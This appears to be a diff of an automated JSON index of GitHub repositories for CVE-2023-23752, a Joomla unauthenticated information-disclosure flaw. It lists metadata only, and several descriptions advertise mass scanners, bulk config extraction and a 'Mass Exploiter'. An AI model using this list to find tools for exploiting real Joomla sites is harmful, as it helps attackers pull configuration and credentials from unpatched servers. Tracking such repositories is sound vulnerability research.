"stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 605405382, + "name": "CVE-2023-23752-Joomla", + "full_name": "ifacker\/CVE-2023-23752-Joomla", + "owner": { + "login": "ifacker", + "id": 26481367, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26481367?v=4", + "html_url": "https:\/\/github.com\/ifacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifacker\/CVE-2023-23752-Joomla", + "description": "CVE-2023-23752 Joomla 未授权访问漏洞 poc", + "fork": false, + "created_at": "2023-02-23T04:37:31Z", + "updated_at": "2023-02-28T06:32:30Z", + "pushed_at": "2023-02-23T07:04:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605829176, + "name": "CVE-2023-23752", + "full_name": "z3n70\/CVE-2023-23752", + "owner": { + "login": "z3n70", + "id": 39817707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39817707?v=4", + "html_url": "https:\/\/github.com\/z3n70", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3n70\/CVE-2023-23752", + "description": "simple program for joomla CVE-2023-23752 scanner for pentesting and educational purpose", + "fork": false, + "created_at": "2023-02-24T01:33:55Z", + "updated_at": "2024-06-11T18:01:48Z", + "pushed_at": "2023-02-24T04:45:36Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608227467, + "name": "CVE-2023-23752", + "full_name": "keyuan15\/CVE-2023-23752", + "owner": { + "login": "keyuan15", + "id": 56430812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56430812?v=4", + "html_url": "https:\/\/github.com\/keyuan15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keyuan15\/CVE-2023-23752", + "description": "Joomla 未授权访问漏洞 CVE-2023-23752", + "fork": false, + "created_at": "2023-03-01T15:28:24Z", + "updated_at": "2023-09-03T18:05:05Z", + "pushed_at": "2023-03-03T06:47:17Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610760106, + "name": "CVE-2023-23752", + "full_name": "adriyansyah-mf\/CVE-2023-23752", + "owner": { + "login": "adriyansyah-mf", + "id": 72158292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72158292?v=4", + "html_url": "https:\/\/github.com\/adriyansyah-mf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adriyansyah-mf\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-03-07T12:32:17Z", + "updated_at": "2024-08-12T20:30:08Z", + "pushed_at": "2023-03-07T12:32:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611616344, + "name": "CVE-2023-23752", + "full_name": "GhostToKnow\/CVE-2023-23752", + "owner": { + "login": "GhostToKnow", + "id": 127384020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127384020?v=4", + "html_url": "https:\/\/github.com\/GhostToKnow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GhostToKnow\/CVE-2023-23752", + "description": "开源,go多并发批量探测poc,准确率高", + "fork": false, + "created_at": "2023-03-09T07:32:06Z", + "updated_at": "2023-03-10T13:33:53Z", + "pushed_at": "2023-03-10T13:34:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611619510, + "name": "CVE-2023-23752", + "full_name": "gibran-abdillah\/CVE-2023-23752", + "owner": { + "login": "gibran-abdillah", + "id": 70421698, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70421698?v=4", + "html_url": "https:\/\/github.com\/gibran-abdillah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gibran-abdillah\/CVE-2023-23752", + "description": "Bulk scanner + get config from CVE-2023-23752", + "fork": false, + "created_at": "2023-03-09T07:42:03Z", + "updated_at": "2024-11-20T20:36:15Z", + "pushed_at": "2023-03-14T06:39:36Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23752", + "exploit", + "joomla" + ], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612578612, + "name": "Joomla-CVE-2023-23752", + "full_name": "Jenderal92\/Joomla-CVE-2023-23752", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/Joomla-CVE-2023-23752", + "description": "python 2.7", + "fork": false, + "created_at": "2023-03-11T11:20:44Z", + "updated_at": "2023-03-11T11:29:18Z", + "pushed_at": "2023-03-11T11:29:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618403324, + "name": "exploit-CVE-2023-23752", + "full_name": "Acceis\/exploit-CVE-2023-23752", + "owner": { + "login": "Acceis", + "id": 34159431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34159431?v=4", + "html_url": "https:\/\/github.com\/Acceis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Acceis\/exploit-CVE-2023-23752", + "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure", + "fork": false, + "created_at": "2023-03-24T11:50:16Z", + "updated_at": "2024-11-19T14:50:48Z", + "pushed_at": "2023-12-27T11:30:46Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-23752", + "exploit", + "information-disclosure", + "joomla", + "vulnerability" + ], + "visibility": "public", + "forks": 17, + "watchers": 79, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 618717743, + "name": "CVE-2023-23752-Docker", + "full_name": "karthikuj\/CVE-2023-23752-Docker", + "owner": { + "login": "karthikuj", + "id": 59091280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59091280?v=4", + "html_url": "https:\/\/github.com\/karthikuj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthikuj\/CVE-2023-23752-Docker", + "description": "Joomla Unauthorized Access Vulnerability (CVE-2023-23752) Dockerized", + "fork": false, + "created_at": "2023-03-25T06:18:46Z", + "updated_at": "2023-06-07T17:50:13Z", + "pushed_at": "2023-03-25T06:40:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-23752", + "joomla", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619177803, + "name": "CVE-2023-23752", + "full_name": "0xNahim\/CVE-2023-23752", + "owner": { + "login": "0xNahim", + "id": 124348533, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124348533?v=4", + "html_url": "https:\/\/github.com\/0xNahim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNahim\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-03-26T13:58:14Z", + "updated_at": "2024-09-01T23:45:38Z", + "pushed_at": "2023-03-26T18:42:49Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623676111, + "name": "CVE-2023-23752", + "full_name": "adhikara13\/CVE-2023-23752", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-23752", + "description": "Poc for CVE-2023-23752", + "fork": false, + "created_at": "2023-04-04T21:14:19Z", + "updated_at": "2024-08-06T16:36:13Z", + "pushed_at": "2023-04-04T21:28:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624413538, + "name": "Joomla-Scanner", + "full_name": "AkbarWiraN\/Joomla-Scanner", + "owner": { + "login": "AkbarWiraN", + "id": 75610273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75610273?v=4", + "html_url": "https:\/\/github.com\/AkbarWiraN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkbarWiraN\/Joomla-Scanner", + "description": "CVE-2023-23752", + "fork": false, + "created_at": "2023-04-06T12:15:50Z", + "updated_at": "2024-03-17T20:25:35Z", + "pushed_at": "2023-04-06T12:28:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625201230, + "name": "Scanner-CVE-2023-23752", + "full_name": "Ge-Per\/Scanner-CVE-2023-23752", + "owner": { + "login": "Ge-Per", + "id": 97132622, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97132622?v=4", + "html_url": "https:\/\/github.com\/Ge-Per", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ge-Per\/Scanner-CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-04-08T11:27:09Z", + "updated_at": "2024-01-18T19:11:27Z", + "pushed_at": "2023-06-12T10:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625551982, + "name": "CVE-2023-23752", + "full_name": "ThatNotEasy\/CVE-2023-23752", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-23752", + "description": "Perform With Mass Exploiter In Joomla 4.2.8.", + "fork": false, + "created_at": "2023-04-09T13:20:48Z", + "updated_at": "2024-08-12T20:30:44Z", + "pushed_at": "2023-07-24T22:22:00Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "joomla-cms", + "leaked-databases", + "masscan" + ], + "visibility": "public", + "forks": 8, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654473257, + "name": "CVE-2023-23752", + "full_name": "Sweelg\/CVE-2023-23752", + "owner": { + "login": "Sweelg", + "id": 86879265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879265?v=4", + "html_url": "https:\/\/github.com\/Sweelg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sweelg\/CVE-2023-23752", + "description": "Joomla未授权访问漏洞", + "fork": false, + "created_at": "2023-06-16T07:53:22Z", + "updated_at": "2023-07-01T14:47:47Z", + "pushed_at": "2023-06-16T08:27:40Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 670890725, + "name": "CVE-2023-23752", + "full_name": "MrP4nda1337\/CVE-2023-23752", + "owner": { + "login": "MrP4nda1337", + "id": 138918718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138918718?v=4", + "html_url": "https:\/\/github.com\/MrP4nda1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrP4nda1337\/CVE-2023-23752", + "description": "simple program for joomla scanner CVE-2023-23752 with target list", + "fork": false, + "created_at": "2023-07-26T04:33:46Z", + "updated_at": "2023-07-28T13:48:27Z", + "pushed_at": "2023-07-26T18:47:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 705283440, + "name": "CVE-2023-23752", + "full_name": "lainonz\/CVE-2023-23752", + "owner": { + "login": "lainonz", + "id": 73258312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73258312?v=4", + "html_url": "https:\/\/github.com\/lainonz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lainonz\/CVE-2023-23752", + "description": "Mass CVE-2023-23752 scanner", + "fork": false, + "created_at": "2023-10-15T15:30:14Z", + "updated_at": "2024-06-02T03:10:30Z", + "pushed_at": "2024-06-02T03:10:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707585637, + "name": "CVE-2023-23752", + "full_name": "yTxZx\/CVE-2023-23752", + "owner": { + "login": "yTxZx", + "id": 100921463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4", + "html_url": "https:\/\/github.com\/yTxZx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yTxZx\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-10-20T08:17:48Z", + "updated_at": "2023-10-20T08:19:57Z", + "pushed_at": "2023-10-20T08:35:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707706726, + "name": "CVE-2023-23752", + "full_name": "AlissonFaoli\/CVE-2023-23752", + "owner": { + "login": "AlissonFaoli", + "id": 129133392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129133392?v=4", + "html_url": "https:\/\/github.com\/AlissonFaoli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlissonFaoli\/CVE-2023-23752", + "description": "Joomla Unauthenticated Information Disclosure (CVE-2023-23752) exploit", + "fork": false, + "created_at": "2023-10-20T13:32:28Z", + "updated_at": "2024-04-25T19:49:11Z", + "pushed_at": "2024-04-25T19:49:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709715554, + "name": "CVE-2023-23752", + "full_name": "Pushkarup\/CVE-2023-23752", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-23752", + "description": "Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).", + "fork": false, + "created_at": "2023-10-25T08:53:12Z", + "updated_at": "2024-03-26T00:00:16Z", + "pushed_at": "2023-10-25T09:39:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711978619, + "name": "CVE-2023-23752", + "full_name": "blacks1ph0n\/CVE-2023-23752", + "owner": { + "login": "blacks1ph0n", + "id": 139291686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139291686?v=4", + "html_url": "https:\/\/github.com\/blacks1ph0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blacks1ph0n\/CVE-2023-23752", + "description": "Joomla Unauthorized Access Vulnerability", + "fork": false, + "created_at": "2023-10-30T14:54:56Z", + "updated_at": "2023-10-30T14:54:57Z", + "pushed_at": "2023-11-03T19:14:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724701583, + "name": "Joomla-v4.2.8---CVE-2023-23752", + "full_name": "Youns92\/Joomla-v4.2.8---CVE-2023-23752", + "owner": { + "login": "Youns92", + "id": 56968891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56968891?v=4", + "html_url": "https:\/\/github.com\/Youns92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Youns92\/Joomla-v4.2.8---CVE-2023-23752", + "description": "CVE-2023-23752 ", + "fork": false, + "created_at": "2023-11-28T16:08:16Z", + "updated_at": "2024-08-23T15:19:33Z", + "pushed_at": "2023-11-28T16:27:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725209716, + "name": "Joomla-CVE-2023-23752-Exploit-Script", + "full_name": "Ly0kha\/Joomla-CVE-2023-23752-Exploit-Script", + "owner": { + "login": "Ly0kha", + "id": 8098943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8098943?v=4", + "html_url": "https:\/\/github.com\/Ly0kha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ly0kha\/Joomla-CVE-2023-23752-Exploit-Script", + "description": "Joomla CVE-2023-23752 Exploit Script", + "fork": false, + "created_at": "2023-11-29T17:01:08Z", + "updated_at": "2023-11-29T17:03:00Z", + "pushed_at": "2023-11-29T17:07:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725708886, + "name": "CVE-2023-23752", + "full_name": "r3dston3\/CVE-2023-23752", + "owner": { + "login": "r3dston3", + "id": 152495093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152495093?v=4", + "html_url": "https:\/\/github.com\/r3dston3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dston3\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-11-30T17:55:38Z", + "updated_at": "2024-02-21T00:50:58Z", + "pushed_at": "2023-11-30T18:07:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725802473, + "name": "CVE-2023-23752", + "full_name": "svaltheim\/CVE-2023-23752", + "owner": { + "login": "svaltheim", + "id": 30341113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30341113?v=4", + "html_url": "https:\/\/github.com\/svaltheim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/svaltheim\/CVE-2023-23752", + "description": null, + "fork": false, + "created_at": "2023-11-30T22:47:40Z", + "updated_at": "2023-11-30T23:01:00Z", + "pushed_at": "2023-11-30T23:03:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 725855935, + "name": "Joomla-CVE-2023-23752", + "full_name": "Fernando-olv\/Joomla-CVE-2023-23752", + "owner": { + "login": "Fernando-olv", + "id": 70062249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70062249?v=4", + "html_url": "https:\/\/github.com\/Fernando-olv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fernando-olv\/Joomla-CVE-2023-23752", + "description": "This Python implementation serves an educational purpose by demonstrating the exploitation of CVE-2023-23752. The code provides insight into the vulnerability's exploitation.", + "fork": false, + "created_at": "2023-12-01T02:25:04Z", + "updated_at": "2023-12-04T21:33:52Z", + "pushed_at": "2023-12-04T00:34:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 727232698, + "name": "CVE-2023-23752-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2023-23752-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-23752-EXPLOIT", + "description": "A PoC exploit for CVE-2023-23752 - Joomla Improper Access Check in Versions 4.0.0 through 4.2.7", + "fork": false, + "created_at": "2023-12-04T13:05:08Z", + "updated_at": "2024-11-25T06:02:13Z", + "pushed_at": "2023-12-04T13:30:56Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23752", + "exploit", + "hacking", + "joomla", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730330313, + "name": "CVE-2023-23752_Joomla", + "full_name": "hadrian3689\/CVE-2023-23752_Joomla", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/CVE-2023-23752_Joomla", + "description": null, + "fork": false, + "created_at": "2023-12-11T17:30:31Z", + "updated_at": "2023-12-11T17:34:23Z", + "pushed_at": "2023-12-11T17:34:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730952063, + "name": "CVE-2023-23752", + "full_name": "C1ph3rX13\/CVE-2023-23752", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-23752", + "description": "CVE-2023-23752 Joomla Unauthenticated Information Disclosure", + "fork": false, + "created_at": "2023-12-13T03:13:54Z", + "updated_at": "2023-12-13T03:32:32Z", + "pushed_at": "2023-12-25T10:24:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732835153, + "name": "CVE-2023-23752", + "full_name": "JeneralMotors\/CVE-2023-23752", + "owner": { + "login": "JeneralMotors", + "id": 60910202, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60910202?v=4", + "html_url": "https:\/\/github.com\/JeneralMotors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JeneralMotors\/CVE-2023-23752", + "description": "An access control flaw was identified, potentially leading to unauthorized access to critical webservice endpoints within Joomla! CMS versions 4.0.0 through 4.2.7. This vulnerability could be exploited by attackers to gain unauthorized access to sensitive information or perform unauthorized actions.", + "fork": false, + "created_at": "2023-12-18T00:47:27Z", + "updated_at": "2023-12-18T01:42:50Z", + "pushed_at": "2023-12-18T04:27:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733652712, + "name": "CVE-2023-23752", + "full_name": "gunzf0x\/CVE-2023-23752", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/CVE-2023-23752", + "description": "Binaries for \"CVE-2023-23752\"", + "fork": false, + "created_at": "2023-12-19T20:18:49Z", + "updated_at": "2023-12-19T20:32:57Z", + "pushed_at": "2023-12-19T20:31:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "binaries-included", + "cve-2023-23752", + "go", + "golang" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734079534, + "name": "CVE-2023-23752", + "full_name": "TindalyTn\/CVE-2023-23752", + "owner": { + "login": "TindalyTn", + "id": 104759010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104759010?v=4", + "html_url": "https:\/\/github.com\/TindalyTn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TindalyTn\/CVE-2023-23752", + "description": "Mass Scanner for CVE-2023-23752", + "fork": false, + "created_at": "2023-12-20T20:20:15Z", + "updated_at": "2023-12-20T20:21:34Z", + "pushed_at": "2023-12-20T20:22:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736906405, + "name": "CVE-2023-23752", + "full_name": "shellvik\/CVE-2023-23752", + "owner": { + "login": "shellvik", + "id": 86082783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86082783?v=4", + "html_url": "https:\/\/github.com\/shellvik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellvik\/CVE-2023-23752", + "description": "Joomla Information disclosure exploit code written in C++.", + "fork": false, + "created_at": "2023-12-29T08:09:24Z", + "updated_at": "2023-12-29T08:09:24Z", + "pushed_at": "2023-12-29T08:09:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759783810, + "name": "CVE-2023-23752", + "full_name": "Rival420\/CVE-2023-23752", + "owner": { + "login": "Rival420", + "id": 51548322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51548322?v=4", + "html_url": "https:\/\/github.com\/Rival420", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rival420\/CVE-2023-23752", + "description": "Joomla! < 4.2.8 - Unauthenticated information disclosure exploit", + "fork": false, + "created_at": "2024-02-19T10:27:01Z", + "updated_at": "2024-02-19T10:27:35Z", + "pushed_at": "2024-02-19T11:26:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + 